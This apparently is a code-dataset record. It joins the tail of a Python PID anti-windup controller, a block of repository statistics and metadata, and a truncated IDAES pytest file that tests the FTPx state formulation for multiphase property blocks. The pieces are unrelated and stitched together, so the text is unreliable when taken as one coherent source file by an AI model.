return self.apply_control(error)
class PIDantiwindup:
def __init__(self, k_p, k_i, k_d, u_max=U_MAX):
# Ziegler Nichols method
# Check here https://en.wikipedia.org/wiki/Ziegler–Nichols_method
# self.k_p = 0.3*K_u
# self.k_i = 1.2*K_u/T_u
# self.k_d = 3*K_u*T_u/40
# self.k_p = 0.45*K_u
# self.k_i = 0.54*K_u/T_u
self.k_p = k_p
self.k_i = k_i
self.k_d = k_d
self.T = TS # Sampling time
self.t = [0]
self.u_p = [0] # Proportional term
self.u_i = [0] # Integral term
self.u_d = [0] # Derivative term
self.u_max = u_max
self.u_min = -u_max
self.control = [0] # Control memory
self.control_bnd = [0]
self.T_t = 1 # Time constant for integration reset
self.integ = Integrator()
self.diff = Derivator()
def apply_control(self, error):
P = self.k_p * error
self.u_p.append(P)
wind_reset = (self.control_bnd[-1] - self.control[-1]) / self.T_t
I = self.integ(self.k_i * error + wind_reset) # Anti windup mechanism
self.u_i.append(I)
D = self.k_d * self.diff(error)
self.u_d.append(D)
u_f = self.u_p[-1] + self.u_i[-1] + self.u_d[-1]
self.control.append(u_f)
# Bound control
u_f = max(self.u_min, min(u_f, self.u_max))
self.control_bnd.append(u_f)
self.time_update()
return u_f
def time_update(self):
""" time vector"""
self.t.append(self.t[-1] + self.T)
def __call__(self, error):
""" Callable """
return self.apply_control(error)
| 25.102041
| 80
| 0.499187
| 744
| 4,920
| 3.05914
| 0.102151
| 0.079086
| 0.039543
| 0.015817
| 0.875659
| 0.867311
| 0.858084
| 0.858084
| 0.858084
| 0.850615
| 0
| 0.021998
| 0.31626
| 4,920
| 195
| 81
| 25.230769
| 0.653686
| 0.284146
| 0
| 0.881188
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.118812
| false
| 0
| 0.019802
| 0
| 0.227723
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1755398a5ac669581eb79a0ec0ecb4b2360b261
| 62,240
|
py
|
Python
|
idaes/models/properties/modular_properties/state_definitions/tests/test_FTPx.py
|
OOAmusat/idaes-pse
|
ae7d3bb8e372bc32822dcdcb75e9fd96b78da539
|
[
"RSA-MD"
] | null | null | null |
idaes/models/properties/modular_properties/state_definitions/tests/test_FTPx.py
|
OOAmusat/idaes-pse
|
ae7d3bb8e372bc32822dcdcb75e9fd96b78da539
|
[
"RSA-MD"
] | null | null | null |
idaes/models/properties/modular_properties/state_definitions/tests/test_FTPx.py
|
OOAmusat/idaes-pse
|
ae7d3bb8e372bc32822dcdcb75e9fd96b78da539
|
[
"RSA-MD"
] | 1
|
2022-03-17T11:08:43.000Z
|
2022-03-17T11:08:43.000Z
|
#################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Tests for FTP state formulation
Authors: Andrew Lee
"""
import pytest
import numpy as np
from pytest import approx
from sys import modules
from pyomo.environ import (
ConcreteModel,
Constraint,
Expression,
value,
Var,
Set,
units as pyunits,
)
from pyomo.util.check_units import check_units_equivalent, assert_units_consistent
# Need define_default_scaling_factors, even though it is not used directly
from idaes.models.properties.modular_properties.state_definitions.FTPx import (
FTPx,
define_state,
set_metadata,
define_default_scaling_factors,
state_initialization,
_set_mole_fractions_vle,
_modified_rachford_rice,
)
from idaes.core import (
MaterialFlowBasis,
MaterialBalanceType,
EnergyBalanceType,
declare_process_block_class,
PhaseType,
LiquidPhase,
VaporPhase,
)
from idaes.models.properties.modular_properties.base.generic_property import (
GenericParameterData,
)
from idaes.models.properties.modular_properties.base.tests.dummy_eos import DummyEoS
from idaes.core.util.exceptions import ConfigurationError, UserModelError
from idaes.models.properties.modular_properties.phase_equil.henry import (
ConstantH,
HenryType,
)
from idaes.models.properties.modular_properties.phase_equil.bubble_dew import (
IdealBubbleDew,
)
import idaes.logger as idaeslog
from idaes.models.properties.modular_properties.base.generic_property import (
GenericParameterBlock,
)
from idaes.models.properties.modular_properties.phase_equil.forms import fugacity
from idaes.core import VaporPhase, LiquidPhase, Component
@declare_process_block_class("DummyParameterBlock")
class DummyParameterData(GenericParameterData):
pass
@pytest.mark.unit
def test_set_metadata():
assert set_metadata(None) is None
# Dummy methods for dummied submodules
class dummy_pe:
def return_expression(b, *args):
# Return a dummy expression for the constraint
return b.temperature == 100
def phase_equil(b, *args):
pass
class TestInvalidBounds(object):
@pytest.mark.unit
def test_bad_name(self):
m = ConcreteModel()
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {"p1": {"equation_of_state": DummyEoS}},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
"state_bounds": {"foo": (None, None, None)},
}
)
with pytest.raises(
ConfigurationError,
match="props\[1\] - found unexpected state_bounds key foo. "
"Please ensure bounds are provided only for expected state "
"variables and that you have typed the variable names "
"correctly.",
):
m.props = m.params.build_state_block([1], default={"defined_state": True})
@pytest.mark.unit
def test_mole_frac(self, caplog):
m = ConcreteModel()
caplog.set_level(
idaeslog.WARNING, logger=("idaes.models.properties.modular_properties.")
)
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {"p1": {"equation_of_state": DummyEoS}},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
"state_bounds": {"mole_frac_comp": (None, None, None)},
}
)
# Create a dummy state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
assert (
"props[1] - found state_bounds argument for mole_frac_comp."
" Mole fraction bounds are set automatically and "
"this argument will be ignored." in caplog.text
)
class Test1PhaseDefinedStateFalseNoBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {"p1": {"equation_of_state": DummyEoS}},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": False})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value is None
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value is None
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value is None
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 1
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value is None
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 1
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 3
for i in frame.props[1].mole_frac_phase_comp:
assert i in [("p1", "c1"), ("p1", "c2"), ("p1", "c3")]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert str(frame.props[1].total_flow_balance.body) == str(
frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[frame.params.phase_list[1]]
)
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for i in frame.props[1].component_flow_balances:
assert i in frame.props[1].params.component_list
assert str(frame.props[1].component_flow_balances[i].body) == str(
frame.props[1].mole_frac_comp[i]
- frame.props[1].mole_frac_phase_comp[frame.params.phase_list[1], i]
)
assert isinstance(frame.props[1].sum_mole_frac_out, Constraint)
assert len(frame.props[1].sum_mole_frac_out) == 1
assert str(frame.props[1].sum_mole_frac_out.body) == str(
sum(
frame.props[1].mole_frac_comp[i]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 1
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i]
)
assert_units_consistent(frame.props[1])
class Test1PhaseDefinedStateTrueWithBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {"p1": {"equation_of_state": DummyEoS}},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"state_bounds": {
"flow_mol": (0, 100, 200),
"temperature": (290, 345, 400),
"pressure": (1e5, 3e5, 5e5),
},
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value == 100
assert frame.props[1].flow_mol.lb == 0
assert frame.props[1].flow_mol.ub == 200
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value == 3e5
assert frame.props[1].pressure.lb == 1e5
assert frame.props[1].pressure.ub == 5e5
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value == 345
assert frame.props[1].temperature.lb == 290
assert frame.props[1].temperature.ub == 400
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 1
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value == 100
assert frame.props[1].flow_mol_phase[i].lb == 0
assert frame.props[1].flow_mol_phase[i].ub == 200
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 1
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 3
for i in frame.props[1].mole_frac_phase_comp:
assert i in [("p1", "c1"), ("p1", "c2"), ("p1", "c3")]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert str(frame.props[1].total_flow_balance.body) == str(
frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[frame.params.phase_list[1]]
)
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for i in frame.props[1].component_flow_balances:
assert i in frame.props[1].params.component_list
assert str(frame.props[1].component_flow_balances[i].body) == str(
frame.props[1].mole_frac_comp[i]
- frame.props[1].mole_frac_phase_comp[frame.params.phase_list[1], i]
)
assert not hasattr(frame.props[1], "sum_mole_frac_out")
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 1
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i]
)
assert_units_consistent(frame.props[1])
@pytest.mark.unit
def test_initialization(self, frame):
state_initialization(frame.props[1])
assert isinstance(frame.props[1].temperature, Var)
assert isinstance(frame.props[1].pressure, Var)
assert isinstance(frame.props[1].flow_mol, Var)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert isinstance(frame.props[1].flow_mol_phase_comp, Expression)
assert isinstance(frame.props[1].phase_frac, Var)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert frame.props[1].temperature.value == approx(345)
assert frame.props[1].pressure.value == approx(3e5)
assert frame.props[1].flow_mol.value == approx(100)
assert frame.props[1].phase_frac["p1"].value == approx(1)
assert frame.props[1].flow_mol_phase["p1"].value == approx(100)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp["p1", j].value == approx(1 / 3)
assert approx(100 / 3) == value(frame.props[1].flow_mol_phase_comp["p1", j])
class Test2PhaseDefinedStateFalseNoBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"p1": {"equation_of_state": DummyEoS},
"p2": {"equation_of_state": DummyEoS},
},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": False})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value is None
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value is None
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value is None
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 2
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value is None
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 2
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1 / 2
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 6
for i in frame.props[1].mole_frac_phase_comp:
assert i in [
("p1", "c1"),
("p1", "c2"),
("p1", "c3"),
("p2", "c1"),
("p2", "c2"),
("p2", "c3"),
]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert str(frame.props[1].total_flow_balance.body) == str(
sum(
frame.props[1].flow_mol_phase[p]
for p in frame.props[1].params.phase_list
)
- frame.props[1].flow_mol
)
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for i in frame.props[1].component_flow_balances:
assert i in frame.props[1].params.component_list
assert str(frame.props[1].component_flow_balances[i].body) == str(
frame.props[1].flow_mol * frame.props[1].mole_frac_comp[i]
- sum(
frame.props[1].flow_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, i]
for p in frame.props[1].params.phase_list
)
)
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 1
assert str(frame.props[1].sum_mole_frac.body) == str(
sum(
frame.props[1].mole_frac_phase_comp[
frame.props[1].params.phase_list[1], i
]
for i in frame.props[1].params.component_list
)
- sum(
frame.props[1].mole_frac_phase_comp[
frame.props[1].params.phase_list[2], i
]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].sum_mole_frac_out, Constraint)
assert len(frame.props[1].sum_mole_frac_out) == 1
assert str(frame.props[1].sum_mole_frac_out.body) == str(
sum(
frame.props[1].mole_frac_comp[i]
for i in frame.props[1].params.component_list
)
)
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 2
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i] * frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[i]
)
assert_units_consistent(frame.props[1])
class Test2PhaseDefinedStateTrueWithBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"p1": {"equation_of_state": DummyEoS},
"p2": {"equation_of_state": DummyEoS},
},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"state_bounds": {
"flow_mol": (0, 100, 200),
"temperature": (290, 345, 400),
"pressure": (1e5, 3e5, 5e5),
},
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": True})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value == 100
assert frame.props[1].flow_mol.lb == 0
assert frame.props[1].flow_mol.ub == 200
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value == 3e5
assert frame.props[1].pressure.lb == 1e5
assert frame.props[1].pressure.ub == 5e5
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value == 345
assert frame.props[1].temperature.lb == 290
assert frame.props[1].temperature.ub == 400
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 2
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value == 100 / 2
assert frame.props[1].flow_mol_phase[i].lb == 0
assert frame.props[1].flow_mol_phase[i].ub == 200
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 2
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1 / 2
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 6
for i in frame.props[1].mole_frac_phase_comp:
assert i in [
("p1", "c1"),
("p1", "c2"),
("p1", "c3"),
("p2", "c1"),
("p2", "c2"),
("p2", "c3"),
]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].total_flow_balance, Constraint)
assert len(frame.props[1].total_flow_balance) == 1
assert str(frame.props[1].total_flow_balance.body) == str(
sum(
frame.props[1].flow_mol_phase[p]
for p in frame.props[1].params.phase_list
)
- frame.props[1].flow_mol
)
assert isinstance(frame.props[1].component_flow_balances, Constraint)
assert len(frame.props[1].component_flow_balances) == 3
for i in frame.props[1].component_flow_balances:
assert i in frame.props[1].params.component_list
assert str(frame.props[1].component_flow_balances[i].body) == str(
frame.props[1].flow_mol * frame.props[1].mole_frac_comp[i]
- sum(
frame.props[1].flow_mol_phase[p]
* frame.props[1].mole_frac_phase_comp[p, i]
for p in frame.props[1].params.phase_list
)
)
assert isinstance(frame.props[1].sum_mole_frac, Constraint)
assert len(frame.props[1].sum_mole_frac) == 1
assert str(frame.props[1].sum_mole_frac.body) == str(
sum(
frame.props[1].mole_frac_phase_comp[
frame.props[1].params.phase_list[1], i
]
for i in frame.props[1].params.component_list
)
- sum(
frame.props[1].mole_frac_phase_comp[
frame.props[1].params.phase_list[2], i
]
for i in frame.props[1].params.component_list
)
)
assert not hasattr(frame.props[1], "sum_mole_frac_out")
assert isinstance(frame.props[1].phase_fraction_constraint, Constraint)
assert len(frame.props[1].phase_fraction_constraint) == 2
for i in frame.props[1].phase_fraction_constraint:
assert i in frame.props[1].params.phase_list
assert str(frame.props[1].phase_fraction_constraint[i].body) == str(
frame.props[1].phase_frac[i] * frame.props[1].flow_mol
- frame.props[1].flow_mol_phase[i]
)
assert_units_consistent(frame.props[1])
@pytest.mark.unit
def test_initialization(self, frame):
state_initialization(frame.props[1])
assert isinstance(frame.props[1].temperature, Var)
assert isinstance(frame.props[1].pressure, Var)
assert isinstance(frame.props[1].flow_mol, Var)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert isinstance(frame.props[1].flow_mol_phase_comp, Expression)
assert isinstance(frame.props[1].phase_frac, Var)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert frame.props[1].temperature.value == approx(345)
assert frame.props[1].pressure.value == approx(3e5)
assert frame.props[1].flow_mol.value == approx(100)
for p in frame.props[1].phase_list:
assert frame.props[1].phase_frac[p].value == approx(0.5)
assert frame.props[1].flow_mol_phase[p].value == approx(50)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp[p, j].value == approx(1 / 3)
assert approx(50 / 3) == value(frame.props[1].flow_mol_phase_comp[p, j])
frame.props[1].phase_frac["p1"].value = 0.4
state_initialization(frame.props[1])
assert frame.props[1].phase_frac["p1"].value == approx(0.4)
assert frame.props[1].flow_mol_phase["p1"].value == approx(40)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_comp[j].value == approx(1 / 3)
assert frame.props[1].mole_frac_phase_comp["p1", j].value == approx(1 / 3)
assert approx(40 / 3) == value(frame.props[1].flow_mol_phase_comp["p1", j])
assert frame.props[1].phase_frac["p2"].value == approx(0.5)
assert frame.props[1].flow_mol_phase["p2"].value == approx(50)
for j in frame.props[1].component_list:
assert frame.props[1].mole_frac_phase_comp["p2", j].value == approx(1 / 3)
assert approx(50 / 3) == value(frame.props[1].flow_mol_phase_comp["p2", j])
# To avoid side effects
frame.props[1].phase_frac["p1"].value = 0.5
state_initialization(frame.props[1])
class Test3PhaseDefinedStateFalseNoBounds(object):
# Test define_state method with no bounds and defined_State = False
@pytest.fixture(scope="class")
def frame(self):
m = ConcreteModel()
# Create a dummy parameter block
m.params = DummyParameterBlock(
default={
"components": {"c1": {}, "c2": {}, "c3": {}},
"phases": {
"p1": {"equation_of_state": DummyEoS},
"p2": {"equation_of_state": DummyEoS},
"p3": {"equation_of_state": DummyEoS},
},
"state_definition": modules[__name__],
"pressure_ref": 1e5,
"temperature_ref": 300,
"base_units": {
"time": pyunits.s,
"length": pyunits.m,
"mass": pyunits.kg,
"amount": pyunits.mol,
"temperature": pyunits.K,
},
}
)
# Create state block
m.props = m.params.build_state_block([1], default={"defined_state": False})
# Add necessary variables that would be built by other methods
m.props[1].dens_mol_phase = Var(m.params.phase_list, initialize=1)
m.props[1].enth_mol_phase = Var(m.params.phase_list, initialize=1)
return m
@pytest.mark.unit
def test_always_flash(self, frame):
define_state(frame.props[1])
assert frame.props[1].always_flash
@pytest.mark.unit
def test_vars(self, frame):
# Check that all necessary variables have been constructed and have
# the correct values
assert isinstance(frame.props[1].flow_mol, Var)
assert frame.props[1].flow_mol.value is None
assert check_units_equivalent(frame.props[1].flow_mol, pyunits.mol / pyunits.s)
assert isinstance(frame.props[1].mole_frac_comp, Var)
assert len(frame.props[1].mole_frac_comp) == 3
for i in frame.props[1].mole_frac_comp:
assert i in frame.props[1].params.component_list
assert frame.props[1].mole_frac_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_comp, None)
assert isinstance(frame.props[1].pressure, Var)
assert frame.props[1].pressure.value is None
assert check_units_equivalent(frame.props[1].pressure, pyunits.Pa)
assert isinstance(frame.props[1].temperature, Var)
assert frame.props[1].temperature.value is None
assert check_units_equivalent(frame.props[1].temperature, pyunits.K)
assert isinstance(frame.props[1].flow_mol_phase, Var)
assert len(frame.props[1].flow_mol_phase) == 3
for i in frame.props[1].flow_mol_phase:
assert i in frame.props[1].params.phase_list
assert frame.props[1].flow_mol_phase[i].value is None
assert check_units_equivalent(
frame.props[1].flow_mol_phase, pyunits.mol / pyunits.s
)
assert isinstance(frame.props[1].phase_frac, Var)
assert len(frame.props[1].phase_frac) == 3
for i in frame.props[1].phase_frac:
assert i in frame.props[1].params.phase_list
assert frame.props[1].phase_frac[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].phase_frac, None)
assert isinstance(frame.props[1].mole_frac_phase_comp, Var)
assert len(frame.props[1].mole_frac_phase_comp) == 9
for i in frame.props[1].mole_frac_phase_comp:
assert i in [
("p1", "c1"),
("p1", "c2"),
("p1", "c3"),
("p2", "c1"),
("p2", "c2"),
("p2", "c3"),
("p3", "c1"),
("p3", "c2"),
("p3", "c3"),
]
assert frame.props[1].mole_frac_phase_comp[i].value == 1 / 3
assert check_units_equivalent(frame.props[1].mole_frac_phase_comp, None)
@pytest.mark.unit
def test_constraints(self, frame):
# Check that the correct constraints are present
assert isinstance(frame.props[1].component_flow_balances, Constraint)
